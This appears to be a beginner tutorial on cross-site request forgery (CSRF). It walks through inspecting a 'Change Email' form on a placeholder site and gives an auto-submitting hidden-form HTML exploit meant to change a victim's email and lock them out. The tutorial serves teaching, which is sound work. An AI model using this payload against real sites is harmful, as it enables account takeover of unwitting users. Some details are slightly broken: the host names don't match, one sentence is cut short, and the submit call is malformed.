An Introduction to CSRF Attacks
We have a web application that’s vulnerable to CSRF attacks. What we want to do is to create a malicious
HTML snippet. This page if accessed by an arbitrary user should auto-submit on their behalf, using their own credentials (cookies).
More specifically, the goal is to change a user’s email, and lock them out of the site.
We want to target the “Change Email” form, so let’s do some recon first by logging into our account to check things out.
After logging in, we can see the “Change Email” page on
https://target-site.com/email/change-email. The specific form looks like this:
HTTP/1.1 200 OK ... Content-Length: 3069 <!DOCTYPE html> <html> ... <form class="login-form" action="/email/change-email" method="POST"> <label>Email</label> <input required type="email" name="email" value=""> <button class='button' type='submit'> Update email </button> </form> ...
Let’s submit this form with our account, then intercept it to see what’s inside:
POST /email/change-email HTTP/1.1Host: target-host.com ... Cookie: session=4TPtiDWqNK0xcLA3anvevopNojTU5zTe email=hello%40mail.com
We can see that it’s vulnerable to CSRF attacks because:
- There is a specific action
- It’s a cookie based request
- The request parameters are predictable, in this case it’s just
Now that we have all the pieces, let’s craft the exploit. We want to write a similar form that has hidden inputs, and that auto-submits, like this one:
<html> <body> <form action="https://target-host.com/email/change-email" method="POST"> <input type="hidden" name="email" value="firstname.lastname@example.org" /> </form> <script> document.forms.submit(); </script> </body> </html>
That’s it! We can verify that it does the job by going to the page ourselves and checking the new email